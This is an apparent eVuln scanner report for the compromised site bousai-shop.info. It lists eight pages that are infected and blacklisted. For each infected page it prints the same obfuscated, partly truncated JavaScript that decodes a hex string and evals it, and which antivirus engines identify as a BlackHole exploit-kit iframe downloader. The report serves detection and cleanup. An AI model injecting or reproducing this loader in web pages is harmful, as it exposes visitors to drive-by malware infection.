Malware Scanner report for bousai-shop.info

Malicious/Suspicious/Total urls checked: 8/0/13

8 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "bousai-shop.info" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bousai-shop.info

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://bousai-shop.info/	HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 20 Apr 2014 05:34:08 GMT Location: http://www.bousai-shop.info/ Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.1g Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=33074c9bed3a6eb251d757fa2971b826; path=/ X-Pingback: http://www.bousai-shop.info/xmlrpc.php X-Powered-By: PHP/5.2.17	clean
http://www.bousai-shop.info/	200 OK Content-Length: 78082 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;} if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZ ... 4949 bytes are skipped ...1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)} Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Decode-BLJ [Trj] Ikarus Trojan-Downloader.JS.Iframe nProtect JS:Exploit.BlackHole.OA K7AntiVirus Trojan Comodo TrojWare.JS.Kryptik.xt CAT-QuickHeal HTM/Agent.NXJ McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Agent.bnu Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Trojan.Script.CIV Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.OA F-Prot JS/IFrame.RS AVG JS/Exploit Norman Quidvetis.A GData JS:Exploit.BlackHole.OA Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.OA
http://www.google.com/jsapi	200 OK Content-Length: 24546 Content-Type: text/javascript	clean
http://www.bousai-shop.info/wp-content/themes/wp/js/rollover.js	200 OK Content-Length: 284 Content-Type: application/javascript	clean
http://bousai-shop.info/test404page.js	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Apr 2014 05:34:13 GMT Pragma: no-cache Location: http://www.bousai-shop.info/test404page.js Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.1g Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 20 Apr 2014 05:34:14 GMT Set-Cookie: PHPSESSID=82142acad019bec1be501f7a9f87c6dd; path=/ X-Pingback: http://www.bousai-shop.info/xmlrpc.php X-Powered-By: PHP/5.2.17	clean
http://www.bousai-shop.info/test404page.js	404 Not Found Content-Length: 54561 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;} if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZ ... 4949 bytes are skipped ...1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)} Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Decode-BLJ [Trj] Ikarus Trojan-Downloader.JS.Iframe nProtect JS:Exploit.BlackHole.OA K7AntiVirus Trojan Comodo TrojWare.JS.Kryptik.xt CAT-QuickHeal HTM/Agent.NXJ McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Agent.bnu Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Trojan.Script.CIV Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.OA F-Prot JS/IFrame.RS AVG JS/Exploit Norman Quidvetis.A GData JS:Exploit.BlackHole.OA Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.OA
http://www.bousai-shop.info/?sitemap	200 OK Content-Length: 129878 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;} if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZ ... 4949 bytes are skipped ...1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)} Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Decode-BLJ [Trj] Ikarus Trojan-Downloader.JS.Iframe nProtect JS:Exploit.BlackHole.OA K7AntiVirus Trojan Comodo TrojWare.JS.Kryptik.xt CAT-QuickHeal HTM/Agent.NXJ McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Agent.bnu Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Trojan.Script.CIV Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.OA F-Prot JS/IFrame.RS AVG JS/Exploit Norman Quidvetis.A GData JS:Exploit.BlackHole.OA Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.OA
http://www.bousai-shop.info/sitemap/	200 OK Content-Length: 130462 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;} if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZ ... 4949 bytes are skipped ...1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)} Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Decode-BLJ [Trj] Ikarus Trojan-Downloader.JS.Iframe nProtect JS:Exploit.BlackHole.OA K7AntiVirus Trojan Comodo TrojWare.JS.Kryptik.xt CAT-QuickHeal HTM/Agent.NXJ McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Agent.bnu Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Trojan.Script.CIV Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.OA F-Prot JS/IFrame.RS AVG JS/Exploit Norman Quidvetis.A GData JS:Exploit.BlackHole.OA Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.OA
http://www.bousai-shop.info/wp-includes/js/comment-reply.js?ver=3.4.2	200 OK Content-Length: 786 Content-Type: application/javascript	clean
http://www.bousai-shop.info/%e9%98%b2%e7%81%bd%e3%82%b0%e3%83%83%e3%82%ba%e3%83%81%e3%82%a7%e3%83%83%e3%82%af%e3%83%aa%e3%82%b9%e3%83%88/	200 OK Content-Length: 58436 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;} if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZ ... 4949 bytes are skipped ...1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)} Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Decode-BLJ [Trj] Ikarus Trojan-Downloader.JS.Iframe nProtect JS:Exploit.BlackHole.OA K7AntiVirus Trojan Comodo TrojWare.JS.Kryptik.xt CAT-QuickHeal HTM/Agent.NXJ McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Agent.bnu Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Trojan.Script.CIV Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.OA F-Prot JS/IFrame.RS AVG JS/Exploit Norman Quidvetis.A GData JS:Exploit.BlackHole.OA Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.OA
http://www.bousai-shop.info/%e5%88%a9%e7%94%a8%e8%a6%8f%e7%b4%84/	200 OK Content-Length: 55529 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;} if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZ ... 4949 bytes are skipped ...1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)} Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Decode-BLJ [Trj] Ikarus Trojan-Downloader.JS.Iframe nProtect JS:Exploit.BlackHole.OA K7AntiVirus Trojan Comodo TrojWare.JS.Kryptik.xt CAT-QuickHeal HTM/Agent.NXJ McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Agent.bnu Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Trojan.Script.CIV Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.OA F-Prot JS/IFrame.RS AVG JS/Exploit Norman Quidvetis.A GData JS:Exploit.BlackHole.OA Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.OA
http://www.bousai-shop.info/%e5%85%8d%e8%b2%ac%e4%ba%8b%e9%a0%85/	200 OK Content-Length: 54827 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;} if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZ ... 4949 bytes are skipped ...1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)} Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Decode-BLJ [Trj] Ikarus Trojan-Downloader.JS.Iframe nProtect JS:Exploit.BlackHole.OA K7AntiVirus Trojan Comodo TrojWare.JS.Kryptik.xt CAT-QuickHeal HTM/Agent.NXJ McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Agent.bnu Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Trojan.Script.CIV Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.OA F-Prot JS/IFrame.RS AVG JS/Exploit Norman Quidvetis.A GData JS:Exploit.BlackHole.OA Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.OA
http://www.bousai-shop.info/contact/	200 OK Content-Length: 58181 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;} if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZ ... 4949 bytes are skipped ...1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)} Antivirus reports: AntiVir JS/Quidvetis.A Avast JS:Decode-BLJ [Trj] Ikarus Trojan-Downloader.JS.Iframe nProtect JS:Exploit.BlackHole.OA K7AntiVirus Trojan Comodo TrojWare.JS.Kryptik.xt CAT-QuickHeal HTM/Agent.NXJ McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Agent.bnu Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Trojan.Script.CIV Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.OA F-Prot JS/IFrame.RS AVG JS/Exploit Norman Quidvetis.A GData JS:Exploit.BlackHole.OA Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.OA

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bousai-shop.info

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 20 Apr 2014 05:34:08 GMT
Location: http://www.bousai-shop.info/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.1g
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=33074c9bed3a6eb251d757fa2971b826; path=/
X-Pingback: http://www.bousai-shop.info/xmlrpc.php
X-Powered-By: PHP/5.2.17

...0 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: bousai-shop.info
Referer: http://www.google.com/search?q=bousai-shop.info

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for bousai-shop.info

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools